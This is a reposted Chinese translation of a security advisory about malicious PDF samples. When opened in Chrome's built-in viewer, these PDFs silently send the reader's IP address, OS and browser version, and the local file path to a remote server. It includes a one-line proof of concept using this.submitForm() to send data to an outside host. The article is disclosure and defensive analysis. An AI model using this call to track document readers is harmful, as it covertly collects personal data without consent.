• 【转载】Chrome 0day漏洞:不要用Chrome查看pdf文件


    英文原文地址:https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html

    中文原文地址:https://www.4hou.com/vulnerable/16468.html

    翻译作者:ang010ela

    发布日期:2019年3月1日发布

    版权:嘶吼(如遇版权纠纷请联系QQ:2200475850进行删除!)

    导语:​研究人员发现一起利用chrome 0day漏洞的恶意PDF样本,当用Google Chrome打开PDF 0day样本时就可以追踪用户/收集用户数据,chrome称会在4月份修复该漏洞。

    研究人员发现一起利用Chrome 0day漏洞的恶意PDF样本,当用Google Chrome打开PDF 0day样本时就可以追踪用户/收集用户数据。

    概述

    从2018年12月起,EdgeSpot研究人员检测到利用Google Chrome 0 day漏洞的多个PDF样本。攻击者利用该漏洞可以在用户用Chrome作为本地PDF阅读器时,让PDF文件的发送方来追踪用户和收集用户的部分信息。

    技术细节

    从去年12月开始,研究人员陆续发现一些恶意PDF样本。这些样本在主流的Adobe Reader中打开是没有问题的,但是当用本地Google Chrome打开后会产生一些可疑的流量。

    本文分析的样本是:

    https://www.virustotal.com/#/file/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/detection (最早提交日期为2017-10-01,文件名: “honduras-bginfo.pdf”)

    EdgeSpot的安全引擎将该恶意样本标记为POTENTIAL ZERO-DAY ATTACK (Google Chrome), PERSONAL INFORMATION LEAKAGE,如下图所示:

    Chrome 0day漏洞:不要用Chrome查看pdf文件

    https://edgespot.io/analysis/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/

    当样本在本地Google Chrome中打开后,内容如下图所示:

    Chrome 0day漏洞:不要用Chrome查看pdf文件

    通过在后台抓取流量,研究人员发现了一些数据在没有用户交互的情况下被发送给域名readnotify.com,也就是说这些数据在没有用户授权的情况下被窃取了。

    流量是一个HTTP POST包,如下图所示:

    Chrome 0day漏洞:不要用Chrome查看pdf文件

    用户查看PDF文件时,该PDF实际上是在与C2服务器进行通信。

    根据HTTP包的信息,被收集和发送的用户信息包括:

    · 用户的公网IP地址

    · OS和Chrome版本等

    · PDF文件在用户电脑中的完整路径

    近期,研究人员又发现一些更多的恶意PDF样本,包括2018年11月发现的和最近@insertScript发现的。与之前样本不同的是,新样本:

    · 影响的是Google Chrome(作为本地PDF阅读器),而不是Adobe Reader。

    · 不允许窃取NTLM,但是会泄露操作系统信息和文件保存的路径。

    研究人员分析样本发现在stream-1中有可疑的JS代码。

    Chrome 0day漏洞:不要用Chrome查看pdf文件

    反混淆代码后,研究人员发现根源在于"this.submitForm()" PDF Javascript API。

    研究人员开发了一个PoC,像this.submitForm('http://google.com/test')这样的一个简单的API调用就会使Google Chrome发送个人信息到google.com。

    研究人员已经与Google取得联系,确认了0 day漏洞的详细情况,Chrome团队称该漏洞会在4月底进行更新和修复。

    研究人员建议相关用户在Chrome修复该漏洞前不要使用Chrome查看本地PDF文件,如果只能使用Chrome,那么查看的时候可疑断开网络连接。

    注:edgespot称发文后引起了一些误解,目前已经将原文中的0 day漏洞表述修改为未修复漏洞。

  • 相关阅读:
    ajax
    导入操作
    游标的使用
    多行编辑
    IOS开发之--NSPredicate
    asp.net DataTables
    asp.net 汉字转拼音的车祸现场
    Git 连接细节
    Aspose.Words 操作指北
    码云代码管理插件备忘
  • 原文地址:https://www.cnblogs.com/anbus/p/10460841.html
Copyright © 2020-2023  润新知